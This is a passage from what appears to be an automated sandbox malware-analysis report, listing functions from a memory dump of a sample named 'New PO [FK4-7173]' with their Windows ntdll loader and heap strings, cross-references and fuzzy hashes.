                                                                          • Instruction Fuzzy Hash: 6CC17774108382DFDB19CF58D044B6ABBE4BF84708F04896AF9D5CB299E734DA49CB52
                                                                          Function 01168402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 01168422
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01168421
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0116855E
                                                                          • @, xrefs: 01168591
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1918872054
                                                                          • Opcode ID: 1cde4e108b3bef4e199219559709ac508a27f0e15fd70fa21fa6515fb9d9ad3d
                                                                          • Instruction ID: b59530b26d1182361e9acd71bcc631e43eeaa3496d8879bdb5434f0313532114
                                                                          • Opcode Fuzzy Hash: 1cde4e108b3bef4e199219559709ac508a27f0e15fd70fa21fa6515fb9d9ad3d
                                                                          • Instruction Fuzzy Hash: 77918B71508345AFD72ADE25C840FABBAECFB84758F40092EFA8492151E735D915CB62
                                                                          Function 0116273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011A21DE
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011A22B6
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011A21D9, 011A22B1
                                                                          • .Local, xrefs: 011628D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          • API String ID: 0-1239276146
                                                                          • Opcode ID: 618a444659a2036614b6644d70f928061b1aacf2f2c95f7df42d00649012d84c
                                                                          • Instruction ID: 922bef7a16f8851203dc7ad93c34bd2338a500fd1fe72a583df68e1764841d57
                                                                          • Opcode Fuzzy Hash: 618a444659a2036614b6644d70f928061b1aacf2f2c95f7df42d00649012d84c
                                                                          • Instruction Fuzzy Hash: 06A1D03590022ADBDB2CCF68CC84BA9B7B9BF58354F1541EAD908A7351E7319E90CF81
                                                                          Function 011364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01190FE5
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0119106B
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011910AE
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01191028
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          • API String ID: 0-1468400865
                                                                          • Opcode ID: 1ea2ceaf8283212062488125d29bf4743a9c2fd93451bd13cadb4e19cb702fc1
                                                                          • Instruction ID: 57831ea33ad64edd2e2bb73d1bbcc5022976fe37a51ce5724e2943af40a4bcaa
                                                                          • Opcode Fuzzy Hash: 1ea2ceaf8283212062488125d29bf4743a9c2fd93451bd13cadb4e19cb702fc1
                                                                          • Instruction Fuzzy Hash: 6071C371904305AFCB29DF18C884B977FA8EF957A4F404468F9488B28AD735D689CFD2
                                                                          Function 0115245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpDynamicShimModule, xrefs: 0119A998
                                                                          • apphelp.dll, xrefs: 01152462
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A9A2
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0119A992
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-176724104
                                                                          • Opcode ID: f87b4ab346d24be1a7d32e35eabbbfde0536720be811573b5503addce4ee4354
                                                                          • Instruction ID: 847255f6434a20df5425760c4ab786b5471d6352ac32a417ea7d65e7428ec81f
                                                                          • Opcode Fuzzy Hash: f87b4ab346d24be1a7d32e35eabbbfde0536720be811573b5503addce4ee4354
                                                                          • Instruction Fuzzy Hash: 52312672A00201FBDF3DDF5DB889AAEBBB5FF84B14F260019E920A7245D7B45985C781
                                                                          Function 011429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • HEAP: , xrefs: 01143264
                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0114327D
                                                                          • HEAP[%wZ]: , xrefs: 01143255
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          • API String ID: 0-617086771
                                                                          • Opcode ID: c5ca78bfcf7f7082c9404f7489e97fbe776a1164cf4291738b63d3aaa2ae9948
                                                                          • Instruction ID: 18c19d5acc803f9bd5e65a974f4ce638e2e196800864de64d33f6cc615dce51e
                                                                          • Opcode Fuzzy Hash: c5ca78bfcf7f7082c9404f7489e97fbe776a1164cf4291738b63d3aaa2ae9948
                                                                          • Instruction Fuzzy Hash: A392CD70A042599FDB2DCF68D444BADBBF1FF48B04F188059E899AB391D734A981CF51
                                                                          Function 01140770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          • Opcode ID: cb0d05a5b1eedbfbde4ed870f7cfabaed33a28f77c93aae21160f3fcca028f3a
                                                                          • Instruction ID: e1a740591e73ea6273a4ff8f129bae5c496b7c540d0f7d618b13d118bd6ffddf
                                                                          • Opcode Fuzzy Hash: cb0d05a5b1eedbfbde4ed870f7cfabaed33a28f77c93aae21160f3fcca028f3a
                                                                          • Instruction Fuzzy Hash: 27F1C070B00606DFEB1ECF69C894BAAB7B2FF48704F1441A9E6169B341D734E981CB91
                                                                          Function 01156962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          • API String ID: 0-1077428164
                                                                          • Opcode ID: 07cfe27cbe0368a49f8024b8ea95e9122c2ff8c782a53c35802433b8ba765ea2
                                                                          • Instruction ID: 7fb1babd780d818f87d0ae4b3233214e04b36dab14b1123ae36ad6109150c742
                                                                          • Opcode Fuzzy Hash: 07cfe27cbe0368a49f8024b8ea95e9122c2ff8c782a53c35802433b8ba765ea2
                                                                          • Instruction Fuzzy Hash: E9C2A071608341DFEB6DCF28C841BABBBE5AF88754F45892DE9E987241D734D804CB92
                                                                          Function 0112A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          • API String ID: 0-2779062949
                                                                          • Opcode ID: 3987ab807ba24ae5dd911981741fd4acf89c9fcf0a8701beedcddc6c88fe895e
                                                                          • Instruction ID: 6482c5264e50cfc23c41d91afa6d88ee5a9666f492437365f6c058507d464bbb
                                                                          • Opcode Fuzzy Hash: 3987ab807ba24ae5dd911981741fd4acf89c9fcf0a8701beedcddc6c88fe895e
                                                                          • Instruction Fuzzy Hash: 44A17E719112299BDB35EF68CC88BEAB7B8EF44704F1041E9E909A7250D7359EC5CFA0
                                                                          Function 01150BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A121
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0119A10F
                                                                          • LdrpCheckModule, xrefs: 0119A117
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-161242083
                                                                          • Opcode ID: 7660cc5259c514d223e67c8d12208a8416ddca9414025c2b22f54244f55f154b
                                                                          • Instruction ID: 18b8a2cc08fffbdd592b665a70efc1554528dbb149584f5367ae3eb79cef4fa4
                                                                          • Opcode Fuzzy Hash: 7660cc5259c514d223e67c8d12208a8416ddca9414025c2b22f54244f55f154b
                                                                          • Instruction Fuzzy Hash: 9A71DD71A00205EFDF2DDFA8D884AAEB7F4FF88708F15406DE822A7251E734A945CB51
                                                                          Function 01140A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-1334570610
                                                                          • Opcode ID: 2dbf004c382abf23e7b25e688c491749157eab84bf73ed7196136721f165dc5f
                                                                          • Instruction ID: bc16d43881af6e79bdcd42c2cadb94b4ce5d35d757d199b383429802620025dc
                                                                          • Opcode Fuzzy Hash: 2dbf004c382abf23e7b25e688c491749157eab84bf73ed7196136721f165dc5f
                                                                          • Instruction Fuzzy Hash: F161CF74604301DFDB2DCF29C440BAABBE2FF49B08F14855EE5598B292D770E981CB95
                                                                          Function 0116C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Failed to reallocate the system dirs string !, xrefs: 011A82D7
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011A82DE
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011A82E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1783798831
                                                                          • Opcode ID: 928da4b594975b2e9abe3fbe2e56110e35217c828d48218496e510d3e784b1f2
                                                                          • Instruction ID: 8eb6ac9697ef322b57728f0500c8544e8a19dd0e5872fdd9aba92d95cde6151e
                                                                          • Opcode Fuzzy Hash: 928da4b594975b2e9abe3fbe2e56110e35217c828d48218496e510d3e784b1f2
                                                                          • Instruction Fuzzy Hash: 7A41C176504311BBDB39EF68E844B6B7BE8BF48654F00492AF98897250E779D810CB92
                                                                          Function 011EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • @, xrefs: 011EC1F1
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011EC1C5
                                                                          • PreferredUILanguages, xrefs: 011EC212
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          • Opcode ID: 20a180a911e10a0ce0351c9f76e9df4ccf484b46df030c6c7f325a94be43a086
                                                                          • Instruction ID: 59a4a501bea4abd353e531127c8acfcddda95b785e7cc21cae37ed05fbb315aa
                                                                          • Opcode Fuzzy Hash: 20a180a911e10a0ce0351c9f76e9df4ccf484b46df030c6c7f325a94be43a086
                                                                          • Instruction Fuzzy Hash: 94417372E0061AEBDF19DBD8CC85FEEBBF9AB14704F14406AE609B7240D7749A45CB90
                                                                          Function 011C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          • API String ID: 0-1373925480
                                                                          • Opcode ID: b2476a7e47bf448de25a3996c4b7ce42d85fa37090921b3f939f01c85c812c69
                                                                          • Instruction ID: 8ba23da8d140bb1912d2007ac56f8adc0c1bba0a3340957424859368e1b85c69
                                                                          • Opcode Fuzzy Hash: b2476a7e47bf448de25a3996c4b7ce42d85fa37090921b3f939f01c85c812c69
                                                                          • Instruction Fuzzy Hash: 8E412432A08299CBEB2EDBD8D850BACBBB5FFA5B44F14045DD941EBB81D7349901CB11
                                                                          Function 011B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011B4899
                                                                          • LdrpCheckRedirection, xrefs: 011B488F
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011B4888
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-3154609507
                                                                          • Opcode ID: f1f46893c28ed854b071460f2b5496daf9840f8ad9c5c3d66b5241d1b70d033c
                                                                          • Instruction ID: 44f3cf6cbb36727a3c89812f590e470212df1f73623831d598f817ed544a0c4c
                                                                          • Opcode Fuzzy Hash: f1f46893c28ed854b071460f2b5496daf9840f8ad9c5c3d66b5241d1b70d033c
                                                                          • Instruction Fuzzy Hash: 2241D632A046519FCB29CE9CD8C0AA67BE4EF49650F06855DED8AD7B53D730D800CB91
                                                                          Function 01140BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-2558761708
                                                                          • Opcode ID: 35f2cb6913c9fd10a648169878a1c7aac8effc39f72f8c46aff3a1c8d484b540
                                                                          • Instruction ID: 1508cfac3d174e69c3b638dc5496db7bdefc3a7569368241afeac7578e5c969d
                                                                          • Opcode Fuzzy Hash: 35f2cb6913c9fd10a648169878a1c7aac8effc39f72f8c46aff3a1c8d484b540
                                                                          • Instruction Fuzzy Hash: 43112131319102DFDFAECA19C450BBAB3A6EF44A19F19802EF616DB251EB30D841C75A
                                                                          Function 011B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializationFailure, xrefs: 011B20FA
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011B2104
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 011B20F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          • Opcode ID: f044a09a338d5be3602eca75db62661e8152720003bf77e8ce63c9c49ac778d1
                                                                          • Instruction ID: d3e2a771137be1ad710b7617a7045ac7bebf163a3f363cc74ccbe24d4c3585a2
                                                                          • Opcode Fuzzy Hash: f044a09a338d5be3602eca75db62661e8152720003bf77e8ce63c9c49ac778d1
                                                                          • Instruction Fuzzy Hash: 4BF0C835640308BBE73CEA4DEC46FD97768EB44B54F600069FA0077685D3F0A504C651
                                                                          Function 011403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          • API String ID: 48624451-232158463
                                                                          • Opcode ID: 4fd75d518ee3d19eb909942756ecdf87261dda28f522ff55c78079d724a3260e
                                                                          • Instruction ID: 934238d591757b9c18b0b460981ed7c274fcd603904170a648cf01f6bcdb8a83
                                                                          • Opcode Fuzzy Hash: 4fd75d518ee3d19eb909942756ecdf87261dda28f522ff55c78079d724a3260e
                                                                          • Instruction Fuzzy Hash: DC714771A0014A9FDB09DFA9C990BAEBBF8BF18744F154065E905A7251EB34EE01CBA1
                                                                          Function 0113A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrResSearchResource Exit, xrefs: 0113AA25
                                                                          • LdrResSearchResource Enter, xrefs: 0113AA13
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          • API String ID: 0-4066393604
                                                                          • Opcode ID: 23b3dd918a9e36ace10c1bea4365fa7c3247716931907c711a60993fa18ca6ca
                                                                          • Instruction ID: 3fa9f962db41abfe42f009d1ef0a030d42478033524a99dad851ff8df5925716
                                                                          • Opcode Fuzzy Hash: 23b3dd918a9e36ace10c1bea4365fa7c3247716931907c711a60993fa18ca6ca
                                                                          • Instruction Fuzzy Hash: 49E1C271E00219AFEF2ECFA8D980BAEBBB9FF84314F050425E961E7259D7349941CB11
                                                                          Function 011FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction ID: ce387a762f9360c2e914742acc6c800cfc77f787f6532655e548573ca262cab7
                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction Fuzzy Hash: 08C1B1312043469BE729CF28D845B6BBBE5AFC4318F084A2DF79ACB290D779D505CB52
                                                                          Function 011AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          • Opcode ID: 11f145fd416d32f7d1bac8d5431a95019c69056f5219e29330393338ebc6471f
                                                                          • Instruction ID: 8d3e24ba09e73e6af92b4db40526a2a91f55d1d1910439830db85e453d086be6
                                                                          • Opcode Fuzzy Hash: 11f145fd416d32f7d1bac8d5431a95019c69056f5219e29330393338ebc6471f
                                                                          • Instruction Fuzzy Hash: 02615B76E016199FDB29DFA8C880BAEBFB9FB44704F54402DE649EB291D731A900CB50
                                                                          Function 011D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          • Opcode ID: 12e63691bf1fe698d201c7e4d79d08ea8453e51f2d58e6b44686c05166b006d1
                                                                          • Instruction ID: d54d0ba3163e14d8b0a358c60edcc053606dd38cac56c96d68b275f9ca981efc
                                                                          • Opcode Fuzzy Hash: 12e63691bf1fe698d201c7e4d79d08ea8453e51f2d58e6b44686c05166b006d1
                                                                          • Instruction Fuzzy Hash: 89510971E0021DAFDF15DFA9CC90AEEBBB9EB44758F10052AE611B7690D7309E45CB60
                                                                          Function 011304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • kLsE, xrefs: 01130540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0113063D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 0-2547482624
                                                                          • Opcode ID: 96848103577d993661ce756101a4d1b879eeab83b68fb83c0878a07838a06edb
                                                                          • Instruction ID: 1a17f2f730ec865e8d087a5edb14892ced374dcf523ba635eafdc652f67cef20
                                                                          • Opcode Fuzzy Hash: 96848103577d993661ce756101a4d1b879eeab83b68fb83c0878a07838a06edb
                                                                          • Instruction Fuzzy Hash: 8F51BEB15047429FD729EF28C4446A7BBE4AFC8304F10483EFAEA87289E774D545CB92
                                                                          Function 0113A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0113A309
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0113A2FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          • API String ID: 0-2876891731
                                                                          • Opcode ID: af4f3d2e0bc2312a696a1b28b1526282dba5e2285fbe53d21c08b8832101f129
                                                                          • Instruction ID: e15e1f47de19d0b2397e5ca22e48ca02ab85b805cb9429766cdf0176cfcc921a
                                                                          • Opcode Fuzzy Hash: af4f3d2e0bc2312a696a1b28b1526282dba5e2285fbe53d21c08b8832101f129
                                                                          • Instruction Fuzzy Hash: F6411F30A08255DBEB2DCF58D880BAE7BF4FF80704F1440A9E951DB2A5E3B4D900CB41
                                                                          Function 0116A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          • API String ID: 2994545307-4008356553
                                                                          • Opcode ID: bb64fbf15e0e9610e44bd51166ce73b7cf1ded06422e81f6c7281aa1755ca723
                                                                          • Instruction ID: 16c7df5dc7838af063adc0746d3743e4e95e0bc9b85e58a4cf6ddc8c3cc51378
                                                                          • Opcode Fuzzy Hash: bb64fbf15e0e9610e44bd51166ce73b7cf1ded06422e81f6c7281aa1755ca723
                                                                          • Instruction Fuzzy Hash: 0A014FB2200700AFD326CF24ED09F2A77E8EB80B29F008839F608C7580E374E810CB46
                                                                          Function 0113C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          • Opcode ID: 75b356abc7b4544a36d24fd610cc16b02e7a71d5b4f8980cb97c7b5133d631d3
                                                                          • Instruction ID: e6635745057a7f283a7a08a6bda2804f7cf840aa19db8f0d037825d0fb480871
